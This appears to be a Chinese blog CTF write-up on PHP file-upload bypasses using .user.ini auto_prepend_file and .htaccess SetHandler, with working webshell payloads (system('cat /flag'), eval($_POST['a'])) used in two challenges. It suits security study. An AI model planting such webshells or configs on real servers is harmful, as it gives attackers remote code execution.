文件上传漏洞(.user.ini和.htaccess)

最新推荐文章于 2024-05-14 10:30:00 发布
最新推荐文章于 2024-05-14 10:30:00 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49298265/article/details/111572316
版权

文件上传漏洞(.user.ini和.htaccess )

一 、user.ini

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。实际上,除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。

​ 和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。

我们可以很容易地借助.user.ini文件来构造一个“后门”。auto_append_file、auto_prepend_file

auto_prepend_file=01.gif

01.gif是要包含的文件。

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

例题:[SUCTF 2019]CheckIn

1.测试发现:

服务器为nginx

文件内容不能包含<?

php的exif_imagetype()函数,添加图片文件头GIF89a就可以了

2.看过.user.ini的分析后我们的思路应该比较清晰了,我们可以上传一个这样的.user.ini

GIF89a
auto_prepend_file=a.jpg

image-20201223092557699

3.此时我们注意到上传目录下还有一个index.php,我们正好需要该目录下有一个可执行php文件,那这简直暴露了考点就是.user.ini,看来这个思路应该是可行的

然后再上传一个这样的图片马a.jpg:

GIF89a
<script language='php'>system('cat /flag');</script>

image-20201223092707822最后,我们访问http://9f26d33b-a50f-44fd-8485-c2721470c2a1.node3.buuoj.cn/uploads/e2e7ec165ba05a5e1f3198caa7e22b54/index.php

image-20201223092758787即可得到flag

二 、.htaccess

1.一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入

AddType  application/x-httpd-php

让所有文件解析为php

2.留后门 可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

12345.png 就会以php执行

例题:[GXYCTF2019]BabyUpload

1.文件类型绕过:

Content-Type: image/jpeg

2.首先上传一个.htaccess内容如下的文件

SetHandler application/x-httpd-php

image-20201222231123433

3.文件名后缀不能是 ph 开头,文件内容过滤<?
上传这样的图片马:

GIF89a?
<script language="php">eval($_POST['a']);</script>

image-20201222231324452

4.上蚁剑

img

husb-052
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux入门:文件
米粥粥的博客
09-25 248
Linux入门:文件文件概述文件类型文件权限及修改 文件概述 文件类型 文件权限及修改
文件上传漏洞——.htaccess和.user.ini配置文件的应用
ximo的博客
02-15 1455
一 . htaccess配置文件 htaccess文件是Apache服务器中的一个配置文件,只对该文件所在的目录下的文件起作用。 在htaccess配置文件下有这样一条配置: AddType application/x-httpd-php .php .jpg 这条配置的意思是,php和jpg格式的文件,都会被当做php文件解析;我们可以在追加其他的后缀名,都将其解析为php文件;但是这样未免有些繁琐。 所以还有另外一条配置: SetHandler application/x-httpd-php 这条
文件上传漏洞总结
weixin_48427966的博客
04-22 690
1、上传图片,2、下载服务器渲染过的图片,3、用脚本生成payload.jpg,4、上传图片,传参1=phpinfo();
文件上传漏洞(全网最详细)
最新发布
m0_59598029的博客
05-14 977
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
第21天-WEB漏洞-文件上传之后端黑白名单绕过
MCTSOG的博客
03-05 1885
思维导图 文件上传常见验证 后缀名,类型,文件头等 黑名单:明确不允许上传的格式后缀 如:$deny_ext = array(’.asp’,’.aspx’,’.php’,’.jsp’); 不允许上传后缀为asp, aspx ,php ,jsp 的文件 白名单:明确只允许上传的格式后缀 如:$ext_arr = array(‘jpg’,‘png’,‘gif’); 只允许上传jpg png gif 文件 文件类型:MIME 信息 MIME(Multipurpose Internet Mail Extens
配置 nginx 解析 php
01-05 3975
1.修改 nginx 配置文件 vim /etc/nginx/nginx.conf 在 server 中插入如下代码: location ~ \.php$ { try_files $uri =404; fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name...
文件上传之利用user.ini实现任意文件上传
wcwdnmdnmd的博客
02-02 583
攻防世界的easyupload,利用user.ini实现文件上传
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
Apache服务器中的`.htaccess`文件是一个非常重要的工具,它允许网站管理员无需直接修改服务器的主配置文件即可控制和定制特定目录的行为。`.htaccess`文件主要用于实现一系列HTTP服务器的指令,如URL重写、访问控制...
.htaccess文件保护实例讲解
10-28
.htaccess太强大了,但它本身会不会被破解掉呢,请问如何保护它?
.htaccess文件使用教程总结
09-14
`.htaccess` 文件是Apache服务器配置中的一个非常重要的文件,它允许站点管理员在不修改全局服务器配置的情况下,对特定目录进行自定义设置。这篇教程总结了`.htaccess`文件的多种用途,包括权限控制、重定向、URL...
21个常用的apache .htaccess文件配置技巧分享
09-10
3. **控制访问文件和目录的级别**:`.htaccess`可以限制或拒绝对某些文件或目录的访问。例如,`Deny from all`会阻止所有IP访问,而`Allow from IP地址范围`则只允许特定IP访问。 4. **修改环境变量**:通过`SetEnv...
mac 下 drupal .htaccess配置文件
11-02
如果网站不在根目录则放在对应级别的目录下 并修改htaccess文件119行和123行,将119行RewriteBase /drupal前面的#去除,修改drupal为你自己的目录。将123行 RewriteBase /前加上#。 如果还是访问不了则编辑httpd....
.user.ini配置文件
m0_52051132的博客
12-10 1118
user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/.user.ini 文件作用:所有的 php 文件都自动包含 test.jpg 文件。.user.ini 相当于一个用。类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。再上传一个内容为 php 一句话脚本,命名为 test.jpg。
[文件上传]浅析.user.ini的利用
cosmoslin的博客
10-16 7045
.user.ini php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。 实例 php 配置项中有两个配置可以起到一些作用 auto_prepend_file = <filename> //包含在文件头 auto_append_file = <filename> //包含在文件尾
文件上传 .htaccess 与.user.ini
devil8123665的博客
03-13 2406
htaccess uesr.ini
文件上传漏洞常用绕过方式
热门推荐
qq_62078839的博客
04-07 1万+
目录 文件上传漏洞原理 常用防御方式和常用防御方式的绕过 一、前端JS检测 二、MIME检测 三、白名单检测 %00截断 0x00截断 四、黑名单绕过 文件拓展名绕过 .htaccess文件绕过 .user.ini.绕过 apache解析漏洞 IIS解析漏洞 Nginx解析漏洞 widows系统文件命名规则的特殊利用 五、文件内容检测 ①文件头检测 ②shell检测 六、条件竞争 靶场实战 文件上传漏洞原理 由于网站在对文件的上传功能中没...
删除文件后磁盘空间没有下降的解决方法
dba_lily的博客
03-07 1341
1、故障现象 发现/data磁盘空间不足,df -h与du -sh查看到大小有出入 [oradba@szzjjk07:/data/expdp]$ df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_szzjjk07-lv_root 99G 30G 65G...
PHP文件上传漏洞
BrosyveryOK的博客
11-28 2295
上礼拜一直在搞期中测试和unctf,没啥时间整理,这礼拜继续整理!
.htaccess文件上传漏洞复现
06-03
请注意,.htaccess文件本身并不会造成上传漏洞,它是一种用于配置Apache服务器的文件。我猜测您的问题是如何利用配置错误或者漏洞上传.htaccess文件来实现服务器攻击的。 一些常见的.htaccess文件上传漏洞如下: 1. 目录遍历漏洞: 如果一个服务器上的网站没有正确限制文件上传的目录,攻击者可以上传包含攻击代码的.htaccess文件到网站的某个目录,然后通过访问该目录下的文件来执行攻击代码。 2. 文件名绕过漏洞: 有些服务器在处理上传的文件名时可能会忽略.htaccess后缀,因此攻击者可以上传包含攻击代码的.htaccess文件并将其命名为其他文件类型的后缀名,例如.php、.jpg、.gif等,然后通过访问该文件来执行攻击代码。 3. MIME类型绕过漏洞: 攻击者可以上传一个包含攻击代码的.htaccess文件,并在其中设置MIME类型为可执行文件,这样当服务器处理该文件时就会将其作为可执行文件来执行其中的代码。 请注意,这些漏洞都是由于服务器配置错误或者漏洞造成的,因此最好的解决方法是及时更新服务器软件并开启安全防护措施,例如限制上传文件的类型、大小、目录等。同时,还应该定期检查服务器配置和日志来发现潜在的安全问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值